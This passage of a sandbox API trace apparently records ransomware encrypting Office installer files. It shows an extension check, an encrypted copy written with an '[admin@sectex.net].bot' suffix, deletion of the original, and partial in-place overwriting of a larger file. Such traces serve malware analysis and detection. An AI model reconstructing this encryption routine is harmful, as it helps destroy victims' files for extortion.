	[0041.969] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1
	[0041.969] lstrcmpiW (lpString1=".msi", lpString2=".bot") returned 1
	[0041.969] lstrlenW (lpString="Proofing.msi") returned 12
	[0041.969] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.msi" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proofing.msi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d0
	[0041.969] GetFileSizeEx (in: hFile=0x1d0, lpFileSize=0xa05ff1c | out: lpFileSize=0xa05ff1c*=868864) returned 1
	[0041.969] CloseHandle (hObject=0x1d0) returned 1
	[0041.970] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.msi" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proofing.msi")) returned 0x2020
	[0041.970] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.msi.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proofing.msi.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0041.970] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.msi" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proofing.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d0
	[0041.970] SetFilePointerEx (in: hFile=0x1d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa05fec8 | out: lpNewFilePointer=0x0) returned 1
	[0041.970] SetFilePointerEx (in: hFile=0x1d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa05fec8 | out: lpNewFilePointer=0x0) returned 1
	[0041.970] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.msi.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proofing.msi.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1cc
	[0041.970] GetLastError () returned 0x0
	[0041.970] ReadFile (in: hFile=0x1d0, lpBuffer=0xac70020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa05fed4, lpOverlapped=0x0 | out: lpBuffer=0xac70020*, lpNumberOfBytesRead=0xa05fed4*=0xd4200, lpOverlapped=0x0) returned 1
	[0041.987] WriteFile (in: hFile=0x1cc, lpBuffer=0xac70020*, nNumberOfBytesToWrite=0xd4210, lpNumberOfBytesWritten=0xa05fc9c, lpOverlapped=0x0 | out: lpBuffer=0xac70020*, lpNumberOfBytesWritten=0xa05fc9c*=0xd4210, lpOverlapped=0x0) returned 1
	[0042.257] ReadFile (in: hFile=0x1d0, lpBuffer=0xac70020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa05fed4, lpOverlapped=0x0 | out: lpBuffer=0xac70020*, lpNumberOfBytesRead=0xa05fed4*=0x0, lpOverlapped=0x0) returned 1
	[0042.257] WriteFile (in: hFile=0x1cc, lpBuffer=0xac70020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa05fc9c, lpOverlapped=0x0 | out: lpBuffer=0xac70020*, lpNumberOfBytesWritten=0xa05fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0042.360] SetEndOfFile (hFile=0x1cc) returned 1
	[0042.361] CloseHandle (hObject=0x1cc) returned 1
	[0042.368] SetFilePointerEx (in: hFile=0x1d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa05fec8 | out: lpNewFilePointer=0x0) returned 1
	[0042.368] SetEndOfFile (hFile=0x1d0) returned 1
	[0042.375] CloseHandle (hObject=0x1d0) returned 1
	[0042.375] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.msi.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x2020) returned 1
	[0042.376] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.msi" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proofing.msi")) returned 1
	[0042.376] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.msi") returned 75
	[0042.376] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.msi") returned 75
	[0042.376] lstrlenW (lpString=".doc") returned 4
	[0042.376] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1
	[0042.376] lstrlenW (lpString=".docx") returned 5
	[0042.376] lstrcmpiW (lpString1=".docx", lpString2="g.msi") returned -1
	[0042.376] lstrlenW (lpString=".pdf") returned 4
	[0042.376] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1
	[0042.376] lstrlenW (lpString=".xls") returned 4
	[0042.376] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1
	[0042.376] lstrlenW (lpString=".xlsx") returned 5
	[0042.376] lstrcmpiW (lpString1=".xlsx", lpString2="g.msi") returned -1
	[0042.376] lstrlenW (lpString=".ppt") returned 4
	[0042.376] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1
	[0042.376] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.msi") returned 75
	[0042.376] lstrlenW (lpString=".zip") returned 4
	[0042.376] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1
	[0042.376] lstrlenW (lpString=".rar") returned 4
	[0042.376] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1
	[0042.376] lstrlenW (lpString=".bz2") returned 4
	[0042.376] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1
	[0042.376] lstrlenW (lpString=".7z") returned 3
	[0042.377] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1
	[0042.377] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.msi") returned 75
	[0042.377] lstrlenW (lpString=".dbf") returned 4
	[0042.377] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1
	[0042.377] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.msi") returned 75
	[0042.377] lstrlenW (lpString=".1cd") returned 4
	[0042.377] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1
	[0042.377] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.msi") returned 75
	[0042.377] lstrlenW (lpString=".jpg") returned 4
	[0042.377] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1
	[0042.377] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.msi") returned 75
	[0042.377] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.msi") returned 75
	[0042.377] lstrlenW (lpString=".doc") returned 4
	[0042.377] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1
	[0042.377] lstrlenW (lpString=".docx") returned 5
	[0042.377] lstrcmpiW (lpString1=".docx", lpString2="g.msi") returned -1
	[0042.377] lstrlenW (lpString=".pdf") returned 4
	[0042.377] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1
	[0042.377] lstrlenW (lpString=".xls") returned 4
	[0042.377] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1
	[0042.377] lstrlenW (lpString=".xlsx") returned 5
	[0042.377] lstrcmpiW (lpString1=".xlsx", lpString2="g.msi") returned -1
	[0042.377] lstrlenW (lpString=".ppt") returned 4
	[0042.377] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1
	[0042.377] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.msi") returned 75
	[0042.377] lstrlenW (lpString=".zip") returned 4
	[0042.377] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1
	[0042.377] lstrlenW (lpString=".rar") returned 4
	[0042.377] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1
	[0042.377] lstrlenW (lpString=".bz2") returned 4
	[0042.377] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1
	[0042.377] lstrlenW (lpString=".7z") returned 3
	[0042.377] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1
	[0042.378] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.msi") returned 75
	[0042.378] lstrlenW (lpString=".dbf") returned 4
	[0042.378] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1
	[0042.378] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.msi") returned 75
	[0042.378] lstrlenW (lpString=".1cd") returned 4
	[0042.378] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1
	[0042.378] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.msi") returned 75
	[0042.378] lstrlenW (lpString=".jpg") returned 4
	[0042.378] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1
	[0042.378] lstrcmpiW (lpString1=".msi", lpString2=".bot") returned 1
	[0042.378] lstrlenW (lpString="Office32MUI.msi") returned 15
	[0042.378] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\office32mui.msi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d0
	[0042.378] GetFileSizeEx (in: hFile=0x1d0, lpFileSize=0xa05ff1c | out: lpFileSize=0xa05ff1c*=873984) returned 1
	[0042.378] CloseHandle (hObject=0x1d0) returned 1
	[0042.378] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\office32mui.msi")) returned 0x2020
	[0042.379] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.msi.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\office32mui.msi.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0042.379] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\office32mui.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d0
	[0042.379] SetFilePointerEx (in: hFile=0x1d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa05fec8 | out: lpNewFilePointer=0x0) returned 1
	[0042.379] SetFilePointerEx (in: hFile=0x1d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa05fec8 | out: lpNewFilePointer=0x0) returned 1
	[0042.379] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.msi.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\office32mui.msi.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1cc
	[0042.379] GetLastError () returned 0x0
	[0042.379] ReadFile (in: hFile=0x1d0, lpBuffer=0xac70020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa05fed4, lpOverlapped=0x0 | out: lpBuffer=0xac70020*, lpNumberOfBytesRead=0xa05fed4*=0xd5600, lpOverlapped=0x0) returned 1
	[0042.673] WriteFile (in: hFile=0x1cc, lpBuffer=0xac70020*, nNumberOfBytesToWrite=0xd5610, lpNumberOfBytesWritten=0xa05fc9c, lpOverlapped=0x0 | out: lpBuffer=0xac70020*, lpNumberOfBytesWritten=0xa05fc9c*=0xd5610, lpOverlapped=0x0) returned 1
	[0042.982] ReadFile (in: hFile=0x1d0, lpBuffer=0xac70020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa05fed4, lpOverlapped=0x0 | out: lpBuffer=0xac70020*, lpNumberOfBytesRead=0xa05fed4*=0x0, lpOverlapped=0x0) returned 1
	[0042.983] WriteFile (in: hFile=0x1cc, lpBuffer=0xac70020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0xa05fc9c, lpOverlapped=0x0 | out: lpBuffer=0xac70020*, lpNumberOfBytesWritten=0xa05fc9c*=0xf2, lpOverlapped=0x0) returned 1
	[0042.983] SetEndOfFile (hFile=0x1cc) returned 1
	[0042.983] CloseHandle (hObject=0x1cc) returned 1
	[0042.991] SetFilePointerEx (in: hFile=0x1d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa05fec8 | out: lpNewFilePointer=0x0) returned 1
	[0042.991] SetEndOfFile (hFile=0x1d0) returned 1
	[0042.998] CloseHandle (hObject=0x1d0) returned 1
	[0042.998] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.msi.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x2020) returned 1
	[0042.998] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\office32mui.msi")) returned 1
	[0042.998] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.msi") returned 78
	[0042.998] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.msi") returned 78
	[0042.998] lstrlenW (lpString=".doc") returned 4
	[0042.998] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1
	[0042.998] lstrlenW (lpString=".docx") returned 5
	[0042.999] lstrcmpiW (lpString1=".docx", lpString2="I.msi") returned -1
	[0042.999] lstrlenW (lpString=".pdf") returned 4
	[0042.999] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1
	[0042.999] lstrlenW (lpString=".xls") returned 4
	[0042.999] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1
	[0042.999] lstrlenW (lpString=".xlsx") returned 5
	[0042.999] lstrcmpiW (lpString1=".xlsx", lpString2="I.msi") returned -1
	[0042.999] lstrlenW (lpString=".ppt") returned 4
	[0042.999] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1
	[0042.999] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.msi") returned 78
	[0042.999] lstrlenW (lpString=".zip") returned 4
	[0042.999] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1
	[0042.999] lstrlenW (lpString=".rar") returned 4
	[0042.999] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1
	[0042.999] lstrlenW (lpString=".bz2") returned 4
	[0042.999] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1
	[0042.999] lstrlenW (lpString=".7z") returned 3
	[0042.999] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1
	[0042.999] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.msi") returned 78
	[0042.999] lstrlenW (lpString=".dbf") returned 4
	[0042.999] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1
	[0042.999] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.msi") returned 78
	[0042.999] lstrlenW (lpString=".1cd") returned 4
	[0042.999] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1
	[0042.999] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.msi") returned 78
	[0042.999] lstrlenW (lpString=".jpg") returned 4
	[0042.999] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1
	[0042.999] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.msi") returned 78
	[0042.999] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.msi") returned 78
	[0042.999] lstrlenW (lpString=".doc") returned 4
	[0042.999] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1
	[0042.999] lstrlenW (lpString=".docx") returned 5
	[0042.999] lstrcmpiW (lpString1=".docx", lpString2="I.msi") returned -1
	[0042.999] lstrlenW (lpString=".pdf") returned 4
	[0043.000] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1
	[0043.000] lstrlenW (lpString=".xls") returned 4
	[0043.000] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1
	[0043.000] lstrlenW (lpString=".xlsx") returned 5
	[0043.000] lstrcmpiW (lpString1=".xlsx", lpString2="I.msi") returned -1
	[0043.000] lstrlenW (lpString=".ppt") returned 4
	[0043.000] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1
	[0043.000] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.msi") returned 78
	[0043.000] lstrlenW (lpString=".zip") returned 4
	[0043.000] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1
	[0043.000] lstrlenW (lpString=".rar") returned 4
	[0043.000] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1
	[0043.000] lstrlenW (lpString=".bz2") returned 4
	[0043.000] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1
	[0043.000] lstrlenW (lpString=".7z") returned 3
	[0043.000] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1
	[0043.000] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.msi") returned 78
	[0043.000] lstrlenW (lpString=".dbf") returned 4
	[0043.000] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1
	[0043.000] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.msi") returned 78
	[0043.000] lstrlenW (lpString=".1cd") returned 4
	[0043.000] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1
	[0043.000] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.msi") returned 78
	[0043.000] lstrlenW (lpString=".jpg") returned 4
	[0043.000] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1
	[0043.000] lstrcmpiW (lpString1=".msi", lpString2=".bot") returned 1
	[0043.000] lstrlenW (lpString="InfoPathMUI.msi") returned 15
	[0043.000] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\infopathmui.msi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d0
	[0043.001] GetFileSizeEx (in: hFile=0x1d0, lpFileSize=0xa05ff1c | out: lpFileSize=0xa05ff1c*=3124224) returned 1
	[0043.001] CloseHandle (hObject=0x1d0) returned 1
	[0043.001] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\infopathmui.msi")) returned 0x2020
	[0043.001] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.msi.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\infopathmui.msi.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0043.001] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\infopathmui.msi"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.msi.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\infopathmui.msi.id-9c354b42.[admin@sectex.net].bot")) returned 1
	[0043.001] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.msi.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\infopathmui.msi.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d0
	[0043.002] SetFilePointerEx (in: hFile=0x1d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa05fc6c | out: lpNewFilePointer=0x0) returned 1
	[0043.002] SetFilePointerEx (in: hFile=0x1d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa05fc2c | out: lpNewFilePointer=0x0) returned 1
	[0043.002] ReadFile (in: hFile=0x1d0, lpBuffer=0xac70058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0xa05fc38, lpOverlapped=0x0 | out: lpBuffer=0xac70058*, lpNumberOfBytesRead=0xa05fc38*=0x40000, lpOverlapped=0x0) returned 1
	[0043.316] SetFilePointerEx (in: hFile=0x1d0, liDistanceToMove=0xfe400, lpNewFilePointer=0x0, dwMoveMethod=0xa05fc2c | out: lpNewFilePointer=0x0) returned 1
	[0043.316] ReadFile (in: hFile=0x1d0, lpBuffer=0xacb0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0xa05fc38, lpOverlapped=0x0 | out: lpBuffer=0xacb0058*, lpNumberOfBytesRead=0xa05fc38*=0x40000, lpOverlapped=0x0) returned 1
	[0043.323] SetFilePointerEx (in: hFile=0x1d0, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0xa05fc6c | out: lpNewFilePointer=0xffffffff) returned 1
	[0043.323] SetFilePointerEx (in: hFile=0x1d0, liDistanceToMove=0x2bac00, lpNewFilePointer=0x0, dwMoveMethod=0xa05fc2c | out: lpNewFilePointer=0x0) returned 1
	[0043.323] ReadFile (in: hFile=0x1d0, lpBuffer=0xacf0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0xa05fc38, lpOverlapped=0x0 | out: lpBuffer=0xacf0058*, lpNumberOfBytesRead=0xa05fc38*=0x40000, lpOverlapped=0x0) returned 1
	[0043.337] SetFilePointerEx (in: hFile=0x1d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa05fec8 | out: lpNewFilePointer=0x0) returned 1
	[0043.337] WriteFile (in: hFile=0x1d0, lpBuffer=0xac70020*, nNumberOfBytesToWrite=0xc010a, lpNumberOfBytesWritten=0xa05fcb0, lpOverlapped=0x0 | out: lpBuffer=0xac70020*, lpNumberOfBytesWritten=0xa05fcb0*=0xc010a, lpOverlapped=0x0) returned 1
	[0043.730] SetEndOfFile (hFile=0x1d0) returned 1
	[0043.730] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x40000) returned 0xb50b818
	[0043.733] SetFilePointerEx (in: hFile=0x1d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa05fc7c | out: lpNewFilePointer=0x0) returned 1
	[0043.733] WriteFile (in: hFile=0x1d0, lpBuffer=0xb50b818*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0xa05fc88, lpOverlapped=0x0 | out: lpBuffer=0xb50b818*, lpNumberOfBytesWritten=0xa05fc88*=0x40000, lpOverlapped=0x0) returned 1
	[0043.735] SetFilePointerEx (in: hFile=0x1d0, liDistanceToMove=0xfe400, lpNewFilePointer=0x0, dwMoveMethod=0xa05fc7c | out: lpNewFilePointer=0x0) returned 1
	[0043.735] WriteFile (in: hFile=0x1d0, lpBuffer=0xb50b818*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0xa05fc88, lpOverlapped=0x0 | out: lpBuffer=0xb50b818*, lpNumberOfBytesWritten=0xa05fc88*=0x40000, lpOverlapped=0x0) returned 1
	[0043.740] SetFilePointerEx (in: hFile=0x1d0, liDistanceToMove=0x2bac00, lpNewFilePointer=0x0, dwMoveMethod=0xa05fc7c | out: lpNewFilePointer=0x0) returned 1
	[0043.740] WriteFile (in: hFile=0x1d0, lpBuffer=0xb50b818*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0xa05fc88, lpOverlapped=0x0 | out: lpBuffer=0xb50b818*, lpNumberOfBytesWritten=0xa05fc88*=0x40000, lpOverlapped=0x0) returned 1
	[0043.742] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0xb50b818 | out: hHeap=0x7d60000) returned 1
	[0043.742] CloseHandle (hObject=0x1d0) returned 1
	[0043.742] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.msi.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x2020) returned 1
	[0043.742] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.msi") returned 78
	[0043.742] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.msi") returned 78
	[0043.742] lstrlenW (lpString=".doc") returned 4
	[0043.742] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1
	[0043.742] lstrlenW (lpString=".docx") returned 5
	[0043.742] lstrcmpiW (lpString1=".docx", lpString2="I.msi") returned -1
	[0043.742] lstrlenW (lpString=".pdf") returned 4
	[0043.742] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1
	[0043.742] lstrlenW (lpString=".xls") returned 4
	[0043.742] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1
	[0043.742] lstrlenW (lpString=".xlsx") returned 5
	[0043.742] lstrcmpiW (lpString1=".xlsx", lpString2="I.msi") returned -1
	[0043.743] lstrlenW (lpString=".ppt") returned 4
	[0043.743] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1
	[0043.743] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.msi") returned 78
	[0043.743] lstrlenW (lpString=".zip") returned 4
	[0043.743] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1
	[0043.743] lstrlenW (lpString=".rar") returned 4
	[0043.743] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1
	[0043.743] lstrlenW (lpString=".bz2") returned 4
	[0043.743] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1
	[0043.743] lstrlenW (lpString=".7z") returned 3
	[0043.743] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1
	[0043.743] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.msi") returned 78
	[0043.743] lstrlenW (lpString=".dbf") returned 4
	[0043.743] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1
	[0043.743] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.msi") returned 78
